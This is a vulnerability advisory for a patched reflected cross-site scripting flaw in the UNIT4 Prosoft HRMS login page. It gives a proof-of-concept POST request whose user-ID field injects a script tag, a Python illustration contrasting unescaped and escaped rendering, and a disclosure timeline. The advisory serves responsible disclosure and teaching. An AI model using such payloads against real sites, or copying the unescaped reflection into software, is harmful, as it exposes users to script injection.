# Vulnerability type: Cross-site Scripting
# Vendor: http://www.unit4.com/
# Product: UNIT4 Prosoft HRMS
# Product site: http://www.unit4apac.com/products/prosofthrms
# Affected version: 8.14.230.47
# Fixed version: 8.14.330.43
# Credit: Jerold Hoong & Edric Teo
# PROOF OF CONCEPT
The login page of UNIT4's Prosoft HRMS is vulnerable to cross-site scripting.
POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyOQ9kFgQCAQ9
kFgICAQ8WAh4EVGV4dAVfPGxpbmsgcmVsPSJTSE9SVENVVCBJQ09OIiBocmVmPSJBcHBfVGhlbWVzL1BTRGV
mYXVsdC9JbWFnZXMvRmF2SWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz5kAgMPZBYKAgEPZBYCAgMP
DxYCHgdWaXNpYmxlaGRkAgMPZBYCZg8PFgIfAAU0VGhlIGNvZGUgY29udGFpbnMgaW52YWxpZCBjaGFyYWN
0ZXJzLiAoVVNSLlVzZXJDb2RlKWRkAgUPDxYCHwAFBlY4IFVBVGRkAgcPZBYWAgEPZBYEAgEPDxYCHwAFC0
NsaWVudCBDb2RlZGQCBQ8PFgIeDEVycm9yTWVzc2FnZQUIUmVxdWlyZWRkZAIDD2QWBAIBDw8WAh8ABQ
ZTZXJ2ZXJkZAIDDxBkZBYAZAIFD2QWBAIBDw8WAh8ABQhEYXRhYmFzZWRkAgUPDxYCHwIFCFJlcXVpcmV
kZGQCBw9kFgQCAQ8PFgIfAAULTERBUCBEb21haW5kZAIDDxBkZBYAZAIJDw8WAh8ABQdVc2VyIElEZGQCCw
8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCDQ8PFgIfAgUIUmVxdWlyZWRkZAIPDw8WAh8ABQhQYXNzd29yZ
GRkAhMPDxYCHwFoZBYEAgEPDxYCHwAFCExhbmd1YWdlZGQCAw8QZGQWAGQCFQ8PFgIfAAUVRm9yZ290I
HlvdXIgcGFzc3dvcmQ%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyFTQgKAAh4FV2lkdGgbAAAAAADAUkABAAAA
ZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcHlyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQd
GUgTHRkLiBBbGwgUmlnaHRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3
yxmGDZ9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQK1qbSRCwL
WxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E%3Cscript%3Ealert%281%29%3B%3
C%2Fscript%3E&txtPassword=&btnSignIn=Sign+In
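The reflection behind the request above, as an added example that is not part of the original advisory or of the vendor's code: a hypothetical login-form input tag is rendered once with the decoded txtUserID value copied in verbatim (the bug class the advisory reports) and once with HTML attribute encoding (the fix class), and a parser shows which one yields an extra script element. The template, the field handling and the trimmed request body are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed excerpt of the PoC POST body: only the field the advisory shows
# being reflected is kept; the __VIEWSTATE / __EVENTVALIDATION blobs are omitted.
SAMPLE_BODY = ("__EVENTTARGET=&__EVENTARGUMENT="
               "&txtUserID=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E"
               "&txtPassword=&btnSignIn=Sign+In")

# Hypothetical markup for the user-ID box; not the product's real template.
TEMPLATE = '<input name="txtUserID" type="text" value="{value}" />'


def user_id_from_body(body: str) -> str:
    """Return the URL-decoded txtUserID field as the server would receive it."""
    return parse_qs(body, keep_blank_values=True).get("txtUserID", [""])[0]


def render_vulnerable(user_id: str) -> str:
    """Copy the submitted value into the attribute verbatim: the first '"'
    closes the attribute and everything after it becomes page markup."""
    return TEMPLATE.format(value=user_id)


def render_hardened(user_id: str) -> str:
    """Same template, but '"', '<', '>' and '&' become entities, so the
    submitted string stays inside the attribute as data."""
    return TEMPLATE.format(value=escape(user_id, quote=True))


class _TagCollector(HTMLParser):
    """Record every start tag and its (entity-decoded) attributes."""
    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(html: str):
    """Return [(tag, attrs), ...] for the rendered fragment."""
    collector = _TagCollector()
    collector.feed(html)
    collector.close()
    return collector.tags
```

The vulnerable rendering parses as an input element followed by a script element; the hardened one parses as a single input whose value attribute still decodes to the exact string that was submitted.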
# TIMELINE
28/10/2014: Vulnerability found
04/11/2014: Vendor informed
04/11/2014: Vendor responded
30/11/2014: Vendor fixed the issue
14/02/2015: Public disclosure